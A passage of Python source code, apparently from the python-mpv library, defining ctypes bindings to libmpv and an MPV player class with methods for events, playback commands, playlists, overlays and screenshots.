def node_value(self, decoder=identity_decoder):
return MpvNode.node_cast_value(self.val, self.format.value, decoder)
@staticmethod
def node_cast_value(v, fmt=MpvFormat.NODE, decoder=identity_decoder):
if fmt == MpvFormat.NONE:
return None
elif fmt == MpvFormat.STRING:
return decoder(v.string)
elif fmt == MpvFormat.OSD_STRING:
return v.string.decode('utf-8')
elif fmt == MpvFormat.FLAG:
return bool(v.flag)
elif fmt == MpvFormat.INT64:
return v.int64
elif fmt == MpvFormat.DOUBLE:
return v.double
else:
if not v.node: # Check for null pointer
return None
if fmt == MpvFormat.NODE:
return v.node.contents.node_value(decoder)
elif fmt == MpvFormat.NODE_ARRAY:
return v.list.contents.array_value(decoder)
elif fmt == MpvFormat.NODE_MAP:
return v.map.contents.dict_value(decoder)
elif fmt == MpvFormat.BYTE_ARRAY:
return v.byte_array.contents.bytes_value()
else:
raise TypeError('Unknown MPV node format {}. Please submit a bug report.'.format(fmt))
class MpvNodeUnion(Union):
_fields_ = [('string', c_char_p),
('flag', c_int),
('int64', c_int64),
('double', c_double),
('node', POINTER(MpvNode)),
('list', POINTER(MpvNodeList)),
('map', POINTER(MpvNodeList)),
('byte_array', POINTER(MpvByteArray))]
MpvNode._fields_ = [('val', MpvNodeUnion),
('format', MpvFormat)]
MpvNodeList._fields_ = [('num', c_int),
('values', POINTER(MpvNode)),
('keys', POINTER(c_char_p))]
class MpvSubApi(c_int):
MPV_SUB_API_OPENGL_CB = 1
class MpvEvent(Structure):
_fields_ = [('event_id', MpvEventID),
('error', c_int),
('reply_userdata', c_ulonglong),
('data', c_void_p)]
def as_dict(self, decoder=identity_decoder):
dtype = {MpvEventID.END_FILE: MpvEventEndFile,
MpvEventID.PROPERTY_CHANGE: MpvEventProperty,
MpvEventID.GET_PROPERTY_REPLY: MpvEventProperty,
MpvEventID.LOG_MESSAGE: MpvEventLogMessage,
MpvEventID.SCRIPT_INPUT_DISPATCH: MpvEventScriptInputDispatch,
MpvEventID.CLIENT_MESSAGE: MpvEventClientMessage
}.get(self.event_id.value, None)
return {'event_id': self.event_id.value,
'error': self.error,
'reply_userdata': self.reply_userdata,
'event': cast(self.data, POINTER(dtype)).contents.as_dict(decoder=decoder) if dtype else None}
class MpvEventProperty(Structure):
_fields_ = [('name', c_char_p),
('format', MpvFormat),
('data', MpvNodeUnion)]
def as_dict(self, decoder=identity_decoder):
value = MpvNode.node_cast_value(self.data, self.format.value, decoder)
return {'name': self.name.decode('utf-8'),
'format': self.format,
'data': self.data,
'value': value}
class MpvEventLogMessage(Structure):
_fields_ = [('prefix', c_char_p),
('level', c_char_p),
('text', c_char_p)]
def as_dict(self, decoder=identity_decoder):
return { 'prefix': self.prefix.decode('utf-8'),
'level': self.level.decode('utf-8'),
'text': decoder(self.text).rstrip() }
class MpvEventEndFile(Structure):
_fields_ = [('reason', c_int),
('error', c_int)]
EOF = 0
RESTARTED = 1
ABORTED = 2
QUIT = 3
ERROR = 4
REDIRECT = 5
# For backwards-compatibility
@property
def value(self):
return self.reason
def as_dict(self, decoder=identity_decoder):
return {'reason': self.reason, 'error': self.error}
class MpvEventScriptInputDispatch(Structure):
_fields_ = [('arg0', c_int),
('type', c_char_p)]
def as_dict(self, decoder=identity_decoder):
pass # TODO
class MpvEventClientMessage(Structure):
_fields_ = [('num_args', c_int),
('args', POINTER(c_char_p))]
def as_dict(self, decoder=identity_decoder):
return { 'args': [ self.args[i].decode('utf-8') for i in range(self.num_args) ] }
StreamReadFn = CFUNCTYPE(c_int64, c_void_p, POINTER(c_char), c_uint64)
StreamSeekFn = CFUNCTYPE(c_int64, c_void_p, c_int64)
StreamSizeFn = CFUNCTYPE(c_int64, c_void_p)
StreamCloseFn = CFUNCTYPE(None, c_void_p)
StreamCancelFn = CFUNCTYPE(None, c_void_p)
class StreamCallbackInfo(Structure):
_fields_ = [('cookie', c_void_p),
('read', StreamReadFn),
('seek', StreamSeekFn),
('size', StreamSizeFn),
('close', StreamCloseFn), ]
# ('cancel', StreamCancelFn)]
StreamOpenFn = CFUNCTYPE(c_int, c_void_p, c_char_p, POINTER(StreamCallbackInfo))
WakeupCallback = CFUNCTYPE(None, c_void_p)
RenderUpdateFn = CFUNCTYPE(None, c_void_p)
OpenGlCbUpdateFn = CFUNCTYPE(None, c_void_p)
OpenGlCbGetProcAddrFn = CFUNCTYPE(c_void_p, c_void_p, c_char_p)
def _handle_func(name, args, restype, errcheck, ctx=MpvHandle, deprecated=False):
func = getattr(backend, name)
func.argtypes = [ctx] + args if ctx else args
if restype is not None:
func.restype = restype
if errcheck is not None:
func.errcheck = errcheck
if deprecated:
@wraps(func)
def wrapper(*args, **kwargs):
if not wrapper.warned: # Only warn on first invocation to prevent spamming
warn("Backend C api has been deprecated: " + name, DeprecationWarning, stacklevel=2)
wrapper.warned = True
return func(*args, **kwargs)
wrapper.warned = False
globals()['_'+name] = wrapper
else:
globals()['_'+name] = func
def bytes_free_errcheck(res, func, *args):
notnull_errcheck(res, func, *args)
rv = cast(res, c_void_p).value
_mpv_free(res)
return rv
def notnull_errcheck(res, func, *args):
if res is None:
        raise RuntimeError('Underspecified error in MPV when calling {} with args {!r}: NULL pointer returned. '\
'Please consult your local debugger.'.format(func.__name__, args))
return res
ec_errcheck = ErrorCode.raise_for_ec
def _handle_gl_func(name, args=[], restype=None, deprecated=False):
_handle_func(name, args, restype, errcheck=None, ctx=MpvOpenGLCbContext, deprecated=deprecated)
backend.mpv_client_api_version.restype = c_ulong
def _mpv_client_api_version():
ver = backend.mpv_client_api_version()
return ver>>16, ver&0xFFFF
backend.mpv_free.argtypes = [c_void_p]
_mpv_free = backend.mpv_free
backend.mpv_free_node_contents.argtypes = [c_void_p]
_mpv_free_node_contents = backend.mpv_free_node_contents
backend.mpv_create.restype = MpvHandle
_mpv_create = backend.mpv_create
_handle_func('mpv_create_client', [c_char_p], MpvHandle, notnull_errcheck)
_handle_func('mpv_client_name', [], c_char_p, errcheck=None)
_handle_func('mpv_initialize', [], c_int, ec_errcheck)
_handle_func('mpv_detach_destroy', [], None, errcheck=None)
_handle_func('mpv_terminate_destroy', [], None, errcheck=None)
_handle_func('mpv_load_config_file', [c_char_p], c_int, ec_errcheck)
_handle_func('mpv_get_time_us', [], c_ulonglong, errcheck=None)
_handle_func('mpv_set_option', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_set_option_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_command', [POINTER(c_char_p)], c_int, ec_errcheck)
_handle_func('mpv_command_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_command_async', [c_ulonglong, POINTER(c_char_p)], c_int, ec_errcheck)
_handle_func('mpv_command_node', [POINTER(MpvNode), POINTER(MpvNode)], c_int, ec_errcheck)
_handle_func('mpv_command_async', [c_ulonglong, POINTER(MpvNode)], c_int, ec_errcheck)
_handle_func('mpv_set_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_set_property_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_set_property_async', [c_ulonglong, c_char_p, MpvFormat,c_void_p],c_int, ec_errcheck)
_handle_func('mpv_get_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_get_property_string', [c_char_p], c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_osd_string', [c_char_p], c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_async', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck)
_handle_func('mpv_observe_property', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck)
_handle_func('mpv_unobserve_property', [c_ulonglong], c_int, ec_errcheck)
_handle_func('mpv_event_name', [c_int], c_char_p, errcheck=None, ctx=None)
_handle_func('mpv_error_string', [c_int], c_char_p, errcheck=None, ctx=None)
_handle_func('mpv_request_event', [MpvEventID, c_int], c_int, ec_errcheck)
_handle_func('mpv_request_log_messages', [c_char_p], c_int, ec_errcheck)
_handle_func('mpv_wait_event', [c_double], POINTER(MpvEvent), errcheck=None)
_handle_func('mpv_wakeup', [], None, errcheck=None)
_handle_func('mpv_set_wakeup_callback', [WakeupCallback, c_void_p], None, errcheck=None)
_handle_func('mpv_get_wakeup_pipe', [], c_int, errcheck=None)
_handle_func('mpv_stream_cb_add_ro', [c_char_p, c_void_p, StreamOpenFn], c_int, ec_errcheck)
_handle_func('mpv_render_context_create', [MpvRenderCtxHandle, MpvHandle, POINTER(MpvRenderParam)], c_int, ec_errcheck, ctx=None)
_handle_func('mpv_render_context_set_parameter', [MpvRenderParam], c_int, ec_errcheck, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_get_info', [MpvRenderParam], c_int, ec_errcheck, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_set_update_callback', [RenderUpdateFn, c_void_p], None, errcheck=None, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_update', [], c_int64, errcheck=None, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_render', [POINTER(MpvRenderParam)], c_int, ec_errcheck, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_report_swap', [], None, errcheck=None, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_free', [], None, errcheck=None, ctx=MpvRenderCtxHandle)
# Deprecated in v0.29.0 and may disappear eventually
if hasattr(backend, 'mpv_get_sub_api'):
_handle_func('mpv_get_sub_api', [MpvSubApi], c_void_p, notnull_errcheck, deprecated=True)
_handle_gl_func('mpv_opengl_cb_set_update_callback', [OpenGlCbUpdateFn, c_void_p], deprecated=True)
_handle_gl_func('mpv_opengl_cb_init_gl', [c_char_p, OpenGlCbGetProcAddrFn, c_void_p], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_draw', [c_int, c_int, c_int], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_render', [c_int, c_int], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_report_flip', [c_ulonglong], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_uninit_gl', [], c_int, deprecated=True)
def _mpv_coax_proptype(value, proptype=str):
"""Intelligently coax the given python value into something that can be understood as a proptype property."""
if type(value) is bytes:
        return value
elif type(value) is bool:
return b'yes' if value else b'no'
elif proptype in (str, int, float):
return str(proptype(value)).encode('utf-8')
else:
raise TypeError('Cannot coax value of type {} into property type {}'.format(type(value), proptype))
def _make_node_str_list(l):
"""Take a list of python objects and make a MPV string node array from it.
As an example, the python list ``l = [ "foo", 23, false ]`` will result in the following MPV node object::
struct mpv_node {
.format = MPV_NODE_ARRAY,
.u.list = *(struct mpv_node_array){
.num = len(l),
.keys = NULL,
.values = struct mpv_node[len(l)] {
{ .format = MPV_NODE_STRING, .u.string = l[0] },
{ .format = MPV_NODE_STRING, .u.string = l[1] },
...
}
}
}
"""
char_ps = [ c_char_p(_mpv_coax_proptype(e, str)) for e in l ]
node_list = MpvNodeList(
num=len(l),
keys=None,
values=( MpvNode * len(l))( *[ MpvNode(
format=MpvFormat.STRING,
val=MpvNodeUnion(string=p))
for p in char_ps ]))
node = MpvNode(
format=MpvFormat.NODE_ARRAY,
val=MpvNodeUnion(list=pointer(node_list)))
return char_ps, node_list, node, cast(pointer(node), c_void_p)
def _event_generator(handle):
while True:
event = _mpv_wait_event(handle, -1).contents
if event.event_id.value == MpvEventID.NONE:
            return  # PEP 479: raising StopIteration inside a generator would become a RuntimeError
yield event
_py_to_mpv = lambda name: name.replace('_', '-')
_mpv_to_py = lambda name: name.replace('-', '_')
_drop_nones = lambda *args: [ arg for arg in args if arg is not None ]
class _Proxy:
def __init__(self, mpv):
super().__setattr__('mpv', mpv)
class _PropertyProxy(_Proxy):
def __dir__(self):
return super().__dir__() + [ name.replace('-', '_') for name in self.mpv.property_list ]
class _FileLocalProxy(_Proxy):
def __getitem__(self, name):
return self.mpv.__getitem__(name, file_local=True)
def __setitem__(self, name, value):
return self.mpv.__setitem__(name, value, file_local=True)
def __iter__(self):
return iter(self.mpv)
class _OSDPropertyProxy(_PropertyProxy):
def __getattr__(self, name):
return self.mpv._get_property(_py_to_mpv(name), fmt=MpvFormat.OSD_STRING)
def __setattr__(self, _name, _value):
raise AttributeError('OSD properties are read-only. Please use the regular property API for writing.')
class _DecoderPropertyProxy(_PropertyProxy):
def __init__(self, mpv, decoder):
super().__init__(mpv)
super().__setattr__('_decoder', decoder)
def __getattr__(self, name):
return self.mpv._get_property(_py_to_mpv(name), decoder=self._decoder)
def __setattr__(self, name, value):
setattr(self.mpv, _py_to_mpv(name), value)
class GeneratorStream:
"""Transform a python generator into an mpv-compatible stream object. This only supports size() and read(), and
does not support seek(), close() or cancel().
"""
def __init__(self, generator_fun, size=None):
self._generator_fun = generator_fun
self.size = size
def seek(self, offset):
self._read_iter = iter(self._generator_fun())
self._read_chunk = b''
return 0 # We only support seeking to the first byte atm
# implementation in case seeking to arbitrary offsets would be necessary
# while offset > 0:
# offset -= len(self.read(offset))
# return offset
def read(self, size):
if not self._read_chunk:
try:
self._read_chunk += next(self._read_iter)
except StopIteration:
return b''
rv, self._read_chunk = self._read_chunk[:size], self._read_chunk[size:]
return rv
def close(self):
self._read_iter = iter([]) # make next read() call return EOF
def cancel(self):
self._read_iter = iter([]) # make next read() call return EOF
# TODO?
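# Illustrative sketch (an assumption, not part of the original module): GeneratorStream
# adapts a byte-producing generator; seek(0) must be called once to prime the iterator
# before read() is used.
def _example_generator_stream():
    def chunks():
        yield b'#EXTM3U\n'
        yield b'http://example.com/stream\n'

    stream = GeneratorStream(chunks)
    stream.seek(0)                 # only rewinding to the start is supported
    data = b''
    while True:
        chunk = stream.read(4096)
        if not chunk:
            break
        data += chunk
    return data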
class ImageOverlay:
def __init__(self, m, overlay_id, img=None, pos=(0, 0)):
self.m = m
self.overlay_id = overlay_id
self.pos = pos
self._size = None
if img is not None:
self.update(img)
def update(self, img=None, pos=None):
from PIL import Image
if img is not None:
self.img = img
img = self.img
w, h = img.size
stride = w*4
if pos is not None:
self.pos = pos
x, y = self.pos
# Pre-multiply alpha channel
bg = Image.new('RGBA', (w, h), (0, 0, 0, 0))
out = Image.alpha_composite(bg, img)
# Copy image to ctypes buffer
if img.size != self._size:
self._buf = create_string_buffer(w*h*4)
self._size = img.size
ctypes.memmove(self._buf, out.tobytes('raw', 'BGRA'), w*h*4)
source = '&' + str(addressof(self._buf))
self.m.overlay_add(self.overlay_id, x, y, source, 0, 'bgra', w, h, stride)
def remove(self):
self.m.remove_overlay(self.overlay_id)
class FileOverlay:
def __init__(self, m, overlay_id, filename=None, size=None, stride=None, pos=(0,0)):
self.m = m
self.overlay_id = overlay_id
self.pos = pos
self.size = size
self.stride = stride
if filename is not None:
self.update(filename)
def update(self, filename=None, size=None, stride=None, pos=None):
if filename is not None:
self.filename = filename
if pos is not None:
self.pos = pos
if size is not None:
self.size = size
if stride is not None:
self.stride = stride
x, y = self.pos
w, h = self.size
stride = self.stride or 4*w
        self.m.overlay_add(self.overlay_id, x, y, self.filename, 0, 'bgra', w, h, stride)
def remove(self):
self.m.remove_overlay(self.overlay_id)
class MPV(object):
"""See man mpv(1) for the details of the implemented commands. All mpv properties can be accessed as
``my_mpv.some_property`` and all mpv options can be accessed as ``my_mpv['some-option']``.
By default, properties are returned as decoded ``str`` and an error is thrown if the value does not contain valid
    utf-8. To get a decoded ``str`` if possible, but ``bytes`` instead of an error if not, use
``my_mpv.lazy.some_property``. To always get raw ``bytes``, use ``my_mpv.raw.some_property``. To access a
property's decoded OSD value, use ``my_mpv.osd.some_property``.
To get API information on an option, use ``my_mpv.option_info('option-name')``. To get API information on a
property, use ``my_mpv.properties['property-name']``. Take care to use mpv's dashed-names instead of the
underscore_names exposed on the python object.
    To make your program not barf hard the first time it is used on a weird file system, **always** access properties
containing file names or file tags through ``MPV.raw``. """
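    # Illustrative usage sketch (not part of the original docstring; `play`, `ytdl` and the
    # file name below are assumptions based on mpv's documented commands and options):
    #
    #     player = MPV(log_handler=print, ytdl=True)
    #     player['vo'] = 'gpu'
    #     player.play('test.webm')
    #     player.wait_for_playback()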
def __init__(self, *extra_mpv_flags, log_handler=None, start_event_thread=True, loglevel=None, **extra_mpv_opts):
"""Create an MPV instance.
Extra arguments and extra keyword arguments will be passed to mpv as options.
"""
self.handle = _mpv_create()
self._event_thread = None
self._core_shutdown = False
_mpv_set_option_string(self.handle, b'audio-display', b'no')
istr = lambda o: ('yes' if o else 'no') if type(o) is bool else str(o)
try:
for flag in extra_mpv_flags:
_mpv_set_option_string(self.handle, flag.encode('utf-8'), b'')
for k,v in extra_mpv_opts.items():
_mpv_set_option_string(self.handle, k.replace('_', '-').encode('utf-8'), istr(v).encode('utf-8'))
finally:
_mpv_initialize(self.handle)
self.osd = _OSDPropertyProxy(self)
self.file_local = _FileLocalProxy(self)
self.raw = _DecoderPropertyProxy(self, identity_decoder)
self.strict = _DecoderPropertyProxy(self, strict_decoder)
self.lazy = _DecoderPropertyProxy(self, lazy_decoder)
self._event_callbacks = []
self._event_handler_lock = threading.Lock()
self._property_handlers = collections.defaultdict(lambda: [])
self._quit_handlers = set()
self._message_handlers = {}
self._key_binding_handlers = {}
self._event_handle = _mpv_create_client(self.handle, b'py_event_handler')
self._log_handler = log_handler
self._stream_protocol_cbs = {}
self._stream_protocol_frontends = collections.defaultdict(lambda: {})
self.register_stream_protocol('python', self._python_stream_open)
self._python_streams = {}
self._python_stream_catchall = None
self.overlay_ids = set()
self.overlays = {}
if loglevel is not None or log_handler is not None:
self.set_loglevel(loglevel or 'terminal-default')
if start_event_thread:
self._event_thread = threading.Thread(target=self._loop, name='MPVEventHandlerThread')
self._event_thread.daemon = True
self._event_thread.start()
else:
self._event_thread = None
def _loop(self):
for event in _event_generator(self._event_handle):
try:
devent = event.as_dict(decoder=lazy_decoder) # copy data from ctypes
eid = devent['event_id']
with self._event_handler_lock:
if eid == MpvEventID.SHUTDOWN:
self._core_shutdown = True
for callback in self._event_callbacks:
callback(devent)
if eid == MpvEventID.PROPERTY_CHANGE:
pc = devent['event']
name, value, _fmt = pc['name'], pc['value'], pc['format']
for handler in self._property_handlers[name]:
handler(name, value)
if eid == MpvEventID.LOG_MESSAGE and self._log_handler is not None:
ev = devent['event']
self._log_handler(ev['level'], ev['prefix'], ev['text'])
if eid == MpvEventID.CLIENT_MESSAGE:
# {'event': {'args': ['key-binding', 'foo', 'u-', 'g']}, 'reply_userdata': 0, 'error': 0, 'event_id': 16}
target, *args = devent['event']['args']
if target in self._message_handlers:
self._message_handlers[target](*args)
if eid == MpvEventID.SHUTDOWN:
_mpv_detach_destroy(self._event_handle)
return
except Exception as e:
print('Exception inside python-mpv event loop:', file=sys.stderr)
traceback.print_exc()
@property
def core_shutdown(self):
"""Property indicating whether the core has been shut down. Possible causes for this are e.g. the `quit` command
or a user closing the mpv window."""
return self._core_shutdown
def check_core_alive(self):
""" This method can be used as a sanity check to tests whether the core is still alive at the time it is
called."""
if self._core_shutdown:
raise ShutdownError('libmpv core has been shutdown')
def wait_until_paused(self):
"""Waits until playback of the current title is paused or done. Raises a ShutdownError if the core is shutdown while
waiting."""
self.wait_for_property('core-idle')
def wait_for_playback(self):
"""Waits until playback of the current title is finished. Raises a ShutdownError if the core is shutdown while
waiting.
"""
self.wait_for_event('end_file')
def wait_until_playing(self):
"""Waits until playback of the current title has started. Raises a ShutdownError if the core is shutdown while
waiting."""
self.wait_for_property('core-idle', lambda idle: not idle)
def wait_for_property(self, name, cond=lambda val: val, level_sensitive=True):
"""Waits until ``cond`` evaluates to a truthy value on the named property. This can be used to wait for
properties such as ``idle_active`` indicating the player is done with regular playback and just idling around.
Raises a ShutdownError when the core is shutdown while waiting.
"""
with self.prepare_and_wait_for_property(name, cond, level_sensitive):
pass
def wait_for_shutdown(self):
'''Wait for core to shutdown (e.g. through quit() or terminate()).'''
sema = threading.Semaphore(value=0)
@self.event_callback('shutdown')
def shutdown_handler(event):
sema.release()
sema.acquire()
shutdown_handler.unregister_mpv_events()
@contextmanager
def prepare_and_wait_for_property(self, name, cond=lambda val: val, level_sensitive=True):
"""Context manager that waits until ``cond`` evaluates to a truthy value on the named property. See
prepare_and_wait_for_event for usage.
Raises a ShutdownError when the core is shutdown while waiting.
"""
sema = threading.Semaphore(value=0)
def observer(name, val):
if cond(val):
sema.release()
self.observe_property(name, observer)
@self.event_callback('shutdown')
def shutdown_handler(event):
sema.release()
yield
if not level_sensitive or not cond(getattr(self, name.replace('-', '_'))):
sema.acquire()
self.check_core_alive()
shutdown_handler.unregister_mpv_events()
self.unobserve_property(name, observer)
def wait_for_event(self, *event_types, cond=lambda evt: True):
"""Waits for the indicated event(s). If cond is given, waits until cond(event) is true. Raises a ShutdownError
if the core is shutdown while waiting. This also happens when 'shutdown' is in event_types.
"""
with self.prepare_and_wait_for_event(*event_types, cond=cond):
pass
@contextmanager
def prepare_and_wait_for_event(self, *event_types, cond=lambda evt: True):
"""Context manager that waits for the indicated event(s) like wait_for_event after running. If cond is given,
waits until cond(event) is true. Raises a ShutdownError if the core is shutdown while waiting. This also happens
when 'shutdown' is in event_types.
Compared to wait_for_event this handles the case where a thread waits for an event it itself causes in a
thread-safe way. An example from the testsuite is:
with self.m.prepare_and_wait_for_event('client_message'):
self.m.keypress(key)
Using just wait_for_event it would be impossible to ensure the event is caught since it may already have been
handled in the interval between keypress(...) running and a subsequent wait_for_event(...) call.
"""
sema = threading.Semaphore(value=0)
@self.event_callback('shutdown')
def shutdown_handler(event):
sema.release()
@self.event_callback(*event_types)
def target_handler(evt):
if cond(evt):
sema.release()
yield
sema.acquire()
self.check_core_alive()
shutdown_handler.unregister_mpv_events()
target_handler.unregister_mpv_events()
def __del__(self):
if self.handle:
self.terminate()
def terminate(self):
"""Properly terminates this player instance. Preferably use this instead of relying on python's garbage
collector to cause this to be called from the object's destructor.
This method will detach the main libmpv handle and wait for mpv to shut down and the event thread to finish.
"""
self.handle, handle = None, self.handle
if threading.current_thread() is self._event_thread:
raise UserWarning('terminate() should not be called from event thread (e.g. from a callback function). If '
'you want to terminate mpv from here, please call quit() instead, then sync the main thread '
'against the event thread using e.g. wait_for_shutdown(), then terminate() from the main thread. '
'This call has been transformed into a call to quit().')
self.quit()
else:
_mpv_terminate_destroy(handle)
if self._event_thread:
self._event_thread.join()
def set_loglevel(self, level):
"""Set MPV's log level. This adjusts which output will be sent to this object's log handlers. If you just want
mpv's regular terminal output, you don't need to adjust this but just need to pass a log handler to the MPV
constructor such as ``MPV(log_handler=print)``.
Valid log levels are "no", "fatal", "error", "warn", "info", "v", "debug" and "trace". For details see your mpv's
client.h header file.
"""
_mpv_request_log_messages(self._event_handle, level.encode('utf-8'))
def command(self, name, *args):
"""Execute a raw command."""
args = [name.encode('utf-8')] + [ (arg if type(arg) is bytes else str(arg).encode('utf-8'))
for arg in args if arg is not None ] + [None]
_mpv_command(self.handle, (c_char_p*len(args))(*args))
def node_command(self, name, *args, decoder=strict_decoder):
_1, _2, _3, pointer = _make_node_str_list([name, *args])
out = cast(create_string_buffer(sizeof(MpvNode)), POINTER(MpvNode))
ppointer = cast(pointer, POINTER(MpvNode))
_mpv_command_node(self.handle, ppointer, out)
rv = out.contents.node_value(decoder=decoder)
_mpv_free_node_contents(out)
return rv
def seek(self, amount, reference="relative", precision="default-precise"):
"""Mapped mpv seek command, see man mpv(1)."""
self.command('seek', amount, reference, precision)
def revert_seek(self):
"""Mapped mpv revert_seek command, see man mpv(1)."""
self.command('revert_seek')
def frame_step(self):
"""Mapped mpv frame-step command, see man mpv(1)."""
self.command('frame-step')
def frame_back_step(self):
"""Mapped mpv frame_back_step command, see man mpv(1)."""
self.command('frame_back_step')
def property_add(self, name, value=1):
"""Add the given value to the property's value. On overflow or underflow, clamp the property to the maximum. If
``value`` is omitted, assume ``1``.
"""
self.command('add', name, value)
def property_multiply(self, name, factor):
"""Multiply the value of a property with a numeric factor."""
self.command('multiply', name, factor)
def cycle(self, name, direction='up'):
"""Cycle the given property. ``up`` and ``down`` set the cycle direction. On overflow, set the property back to
the minimum, on underflow set it to the maximum. If ``up`` or ``down`` is omitted, assume ``up``.
"""
self.command('cycle', name, direction)
def screenshot(self, includes='subtitles', mode='single'):
"""Mapped mpv screenshot command, see man mpv(1)."""
self.command('screenshot', includes, mode)
def screenshot_to_file(self, filename, includes='subtitles'):
"""Mapped mpv screenshot_to_file command, see man mpv(1)."""
self.command('screenshot_to_file', filename.encode(fs_enc), includes)
def screenshot_raw(self, includes='subtitles'):
"""Mapped mpv screenshot_raw command, see man mpv(1). Returns a pillow Image object."""
from PIL import Image
res = self.node_command('screenshot-raw', includes)
if res['format'] != 'bgr0':
raise ValueError('Screenshot in unknown format "{}". Currently, only bgr0 is supported.'
.format(res['format']))
img = Image.frombytes('RGBA', (res['stride']//4, res['h']), res['data'])
b,g,r,a = img.split()
return Image.merge('RGB', (r,g,b))
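# Example use (a sketch; requires Pillow and a playing video with decoded frames):
#     frame = player.screenshot_raw()   # PIL.Image in RGB
#     frame.save('frame.png')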
def allocate_overlay_id(self):
free_ids = set(range(64)) - self.overlay_ids
if not free_ids:
raise IndexError('All overlay IDs are in use')
next_id, *_ = sorted(free_ids)
self.overlay_ids.add(next_id)
return next_id
def free_overlay_id(self, overlay_id):
self.overlay_ids.remove(overlay_id)
def create_file_overlay(self, filename=None, size=None, stride=None, pos=(0,0)):
overlay_id = self.allocate_overlay_id()
overlay = FileOverlay(self, overlay_id, filename, size, stride, pos)
self.overlays[overlay_id] = overlay
return overlay
def create_image_overlay(self, img=None, pos=(0,0)):
overlay_id = self.allocate_overlay_id()
overlay = ImageOverlay(self, overlay_id, img, pos)
self.overlays[overlay_id] = overlay
return overlay
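# Overlay usage sketch (comments only; assumes Pillow is available and that the overlay
# fits inside the current video, both assumptions of this example):
#     from PIL import Image
#     badge = Image.new('RGBA', (120, 40), (255, 0, 0, 128))
#     ov = player.create_image_overlay(badge, pos=(10, 10))
#     ...
#     ov.remove()   # frees the overlay id again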
def remove_overlay(self, overlay_id):
self.overlay_remove(overlay_id)
self.free_overlay_id(overlay_id)
del self.overlays[overlay_id]
def playlist_next(self, mode='weak'):
"""Mapped mpv playlist_next command, see man mpv(1)."""
self.command('playlist_next', mode)
def playlist_prev(self, mode='weak'):
"""Mapped mpv playlist_prev command, see man mpv(1)."""
self.command('playlist_prev', mode)
def playlist_play_index(self, idx):
"""Mapped mpv playlist-play-index command, see man mpv(1)."""
self.command('playlist-play-index', idx)
@staticmethod
def _encode_options(options):
return ','.join('{}={}'.format(_py_to_mpv(str(key)), str(val)) for key, val in options.items())
def loadfile(self, filename, mode='replace', **options):
"""Mapped mpv loadfile command, see man mpv(1)."""
self.command('loadfile', filename.encode(fs_enc), mode, MPV._encode_options(options))
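# Per-file options go in as keyword arguments and are serialized by _encode_options.
# A hedged example ('start' and 'vid' are standard mpv options, the file name is made up):
#     player.loadfile('movie.mkv', mode='append-play', start='30', vid='no')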
def loadlist(self, playlist, mode='replace'):
"""Mapped mpv loadlist command, see man mpv(1)."""
self.command('loadlist', playlist.encode(fs_enc), mode)
def playlist_clear(self):
"""Mapped mpv playlist_clear command, see man mpv(1)."""
self.command('playlist_clear')
def playlist_remove(self, index='current'):
"""Mapped mpv playlist_remove command, see man mpv(1)."""
self.command('playlist_remove', index)
def playlist_move(self, index1, index2):
"""Mapped mpv playlist_move command, see man mpv(1)."""
self.command('playlist_move', index1, index2)
def playlist_shuffle(self):
"""Mapped mpv playlist-shuffle command, see man mpv(1)."""
self.command('playlist-shuffle')
def playlist_unshuffle(self):
"""Mapped mpv playlist-unshuffle command, see man mpv(1)."""
self.command('playlist-unshuffle')
def run(self, command, *args):
"""Mapped mpv run command, see man mpv(1)."""
self.command('run', command, *args)
def quit(self, code=None):
"""Mapped mpv quit command, see man mpv(1)."""
self.command('quit', code)
def quit_watch_later(self, code=None):
"""Mapped mpv quit_watch_later command, see man mpv(1)."""
self.command('quit_watch_later', code)
def stop(self, keep_playlist=False):
"""Mapped mpv stop command, see man mpv(1)."""
if keep_playlist:
self.command('stop', 'keep-playlist')
else:
self.command('stop')
def audio_add(self, url, flags='select', title=None, lang=None):
"""Mapped mpv audio_add command, see man mpv(1)."""
self.command('audio_add', url.encode(fs_enc), *_drop_nones(flags, title, lang))
def audio_remove(self, audio_id=None):
"""Mapped mpv audio_remove command, see man mpv(1)."""
self.command('audio_remove', audio_id)
def audio_reload(self, audio_id=None):
"""Mapped mpv audio_reload command, see man mpv(1)."""
self.command('audio_reload', audio_id)
def video_add(self, url, flags='select', title=None, lang=None):
"""Mapped mpv video_add command, see man mpv(1)."""
self.command('video_add', url.encode(fs_enc), *_drop_nones(flags, title, lang))
def video_remove(self, video_id=None):
"""Mapped mpv video_remove command, see man mpv(1)."""
self.command('video_remove', video_id)
def video_reload(self, video_id=None):
"""Mapped mpv video_reload command, see man mpv(1)."""
self.command('video_reload', video_id)
def sub_add(self, url, flags='select', title=None, lang=None):
"""Mapped mpv sub_add command, see man mpv(1)."""
self.command('sub_add', url.encode(fs_enc), *_drop_nones(flags, title, lang))
def sub_remove(self, sub_id=None):
"""Mapped mpv sub_remove command, see man mpv(1)."""
self.command('sub_remove', sub_id)
def sub_reload(self, sub_id=None):
"""Mapped mpv sub_reload command, see man mpv(1)."""
self.command('sub_reload', sub_id)
def sub_step(self, skip):
"""Mapped mpv sub_step command, see man mpv(1)."""
self.command('sub_step', skip)
def sub_seek(self, skip):
"""Mapped mpv sub_seek command, see man mpv(1)."""
self.command('sub_seek', skip)
def toggle_osd(self):
"""Mapped mpv osd command, see man mpv(1)."""
self.command('osd')
def print_text(self, text):
"""Mapped mpv print-text command, see man mpv(1)."""
self.command('print-text', text)
